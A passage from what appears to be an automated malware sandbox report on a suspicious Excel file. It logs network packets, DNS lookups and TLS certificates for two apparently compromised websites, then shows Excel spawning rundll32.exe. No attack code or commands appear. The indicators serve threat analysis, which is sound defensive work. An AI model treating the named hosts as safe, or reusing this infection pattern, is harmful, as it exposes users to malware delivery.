Jun 29, 2021 17:47:19.512012005 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.520284891 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.520704031 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.521374941 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.683280945 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.683936119 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.684093952 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.684843063 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.689727068 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.851730108 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.255176067 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.255325079 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.255598068 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.255672932 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.256743908 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.258877993 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.418549061 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.419622898 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.419821978 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.420542955 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.585305929 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.585884094 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.586049080 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.587156057 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.592771053 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.753871918 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.158571959 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.158694983 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.158785105 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.158839941 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.160494089 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.162003040 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.321614027 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.321721077 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.322243929 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.323024988 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.479310989 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.479876041 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.479964972 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.481251001 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.486433983 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.643575907 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:22.044697046 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:22.044873953 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:22.045356035 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:22.045507908 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:22.417372942 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 29, 2021 17:46:58.920005083 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:46:58.969975948 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:00.087795973 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:00.137931108 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:02.795377016 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:02.841855049 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:03.633344889 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:03.683186054 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:04.540199041 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:04.594928026 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:05.699049950 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:05.749738932 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:10.623648882 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:10.678422928 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:12.290111065 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:12.344947100 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:12.721546888 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:12.802370071 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:13.279201984 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:13.352468967 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:14.309581995 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:14.366941929 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:15.324779034 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:15.381751060 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:15.674053907 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:15.723820925 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:16.690315008 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:16.874973059 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:16.939909935 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:16.989156008 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:17.291711092 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:17.347352982 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:18.234659910 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:18.292426109 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:18.780397892 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:18.840291977 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:20.327342033 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:20.376887083 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:21.321446896 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:21.368891001 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:21.376266003 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:21.422806978 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:22.648659945 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:22.695760965 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:24.035027027 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:24.082155943 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:25.153997898 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:25.201874971 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:26.007030964 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:26.053354025 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:27.706262112 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:27.761327028 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:28.807010889 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:28.856395960 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:30.379142046 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:30.427225113 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:30.754729986 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:30.828135967 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:31.738715887 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:31.796335936 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:46.564105988 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:46.703835964 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:47.277631044 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:47.336808920 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:47.336930990 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:47.399616957 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:47.916399002 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:47.974071980 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:48.461107969 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:48.517076015 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:49.200185061 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:49.254686117 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:50.200495958 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:50.334995031 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:50.806651115 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:50.863733053 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:52.137634039 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:52.195139885 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:53.036922932 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:53.091938019 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:53.562647104 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:53.620580912 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:53.920418024 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:53.978780031 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:54.111597061 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:54.166781902 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:06.916482925 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:06.980088949 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:07.127794027 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:07.192032099 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:09.685049057 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:09.743271112 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:41.242436886 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:41.307627916 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:42.787632942 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:42.853935957 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jun 29, 2021 17:47:16.690315008 CEST | 192.168.2.4 | 8.8.8.8 | 0xe30f | Standard query (0) | A (IP address) | IN (0x0001) | |
Jun 29, 2021 17:47:18.234659910 CEST | 192.168.2.4 | 8.8.8.8 | 0x544f | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jun 29, 2021 17:47:16.874973059 CEST | 8.8.8.8 | 192.168.2.4 | 0xe30f | No error (0) | 162.241.2.112 | A (IP address) | IN (0x0001) | ||
Jun 29, 2021 17:47:18.292426109 CEST | 8.8.8.8 | 192.168.2.4 | 0x544f | No error (0) | 108.179.232.80 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jun 29, 2021 17:47:17.197526932 CEST | 162.241.2.112 | 443 | 192.168.2.4 | 49734 | CN=psq.com.mx CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Tue Jul 28 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 | Thu Jul 29 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Fri Nov 02 01:00:00 CET 2018 | Wed Jan 01 00:59:59 CET 2031 | |||||||
Jun 29, 2021 17:47:18.617918968 CEST | 108.179.232.80 | 443 | 192.168.2.4 | 49736 | CN=www.academy.haleemcampus.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Tue May 25 09:21:24 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021 | Mon Aug 23 09:21:24 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | |||||||
CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 17:47:10 |
Start date: | 29/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe40000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:49:08 |
Start date: | 29/06/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x20000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:49:09 |
Start date: | 29/06/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x20000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|